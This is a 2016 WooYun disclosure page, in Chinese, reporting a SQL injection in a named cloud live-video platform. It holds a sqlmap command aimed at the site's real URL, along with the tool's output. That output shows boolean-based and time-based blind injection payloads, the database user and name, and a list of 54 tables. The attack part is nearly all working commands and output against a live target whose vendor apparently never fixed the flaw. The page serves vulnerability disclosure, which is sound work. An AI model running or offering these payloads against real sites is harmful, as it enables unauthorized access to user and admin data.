当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0192961

漏洞标题:某云视频直播平台存在SQL注入漏洞

相关厂商:经常直播

漏洞作者: 绿箭侠

提交时间:2016-04-06 09:30

修复时间:2016-05-21 09:40

公开时间:2016-05-21 09:40

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:6

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-04-06: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-05-21: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

核心团队均来自腾讯等知名互联网企业,在互联网产品规划、云平台建设、流媒体技术领域经验丰富、建树颇多,在解决国内视频直播技术领域具有绝对的优势和前瞻性,被行业推崇为最具发展潜力的视频互动直播。
某云视频直播平台存在SQL注入漏洞

详细说明:

python sqlmap.py -u "http://www.jingchang.tv/index.php?s=/Home/Index/new_show/id/21" --tables -D "cloud"

漏洞证明:

sqlmap identified the following injection point(s) with a total of 102 HTTP(s) requests:
---
Parameter: s (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: s=/Home/Index/new_show/id/21) AND 8951=8951 AND (1886=1886
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: s=/Home/Index/new_show/id/21) AND (SELECT * FROM (SELECT(SLEEP(5)))XNqn) AND (3272=3272
---
back-end DBMS: MySQL 5.0.12
current database:    'cloud'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: s (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: s=/Home/Index/new_show/id/21) AND 8951=8951 AND (1886=1886
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: s=/Home/Index/new_show/id/21) AND (SELECT * FROM (SELECT(SLEEP(5)))XNqn) AND (3272=3272
---
back-end DBMS: MySQL >= 5.0.0
current user:    'cloud@localhost'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: s (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: s=/Home/Index/new_show/id/21) AND 8951=8951 AND (1886=1886
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: s=/Home/Index/new_show/id/21) AND (SELECT * FROM (SELECT(SLEEP(5)))XNqn) AND (3272=3272
---
back-end DBMS: MySQL 5
Database: cloud
[54 tables]
+-----------------------+
| jck_action            |
| jck_action_log        |
| jck_addons            |
| jck_api_group         |
| jck_api_record        |
| jck_apidoc_log        |
| jck_apidoc_main       |
| jck_apidoc_params     |
| jck_apidoc_return     |
| jck_attachment        |
| jck_attribute         |
| jck_auth_extend       |
| jck_auth_group        |
| jck_auth_group_access |
| jck_auth_rule         |
| jck_camera_category   |
| jck_camera_channel    |
| jck_camera_group      |
| jck_camera_main       |
| jck_camera_session    |
| jck_camera_type       |
| jck_category          |
| jck_channel           |
| jck_company_banner    |
| jck_company_category  |
| jck_company_document  |
| jck_company_menu      |
| jck_config            |
| jck_device_camera     |
| jck_device_main       |
| jck_document          |
| jck_document_article  |
| jck_document_download |
| jck_file              |
| jck_general_count     |
| jck_general_nations   |
| jck_general_provinces |
| jck_hooks             |
| jck_menu              |
| jck_model             |
| jck_picture           |
| jck_social_action     |
| jck_social_discuz     |
| jck_social_friends    |
| jck_social_related    |
| jck_store_auth        |
| jck_ucenter_admin     |
| jck_ucenter_app       |
| jck_ucenter_member    |
| jck_ucenter_setting   |
| jck_url               |
| jck_user_article      |
| jck_user_main         |
| jck_userdata          |
+-----------------------+
sqlmap resumed the following injection point(s) from stored session:

修复方案:

版权声明:转载请注明来源 绿箭侠@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:8 (WooYun评价)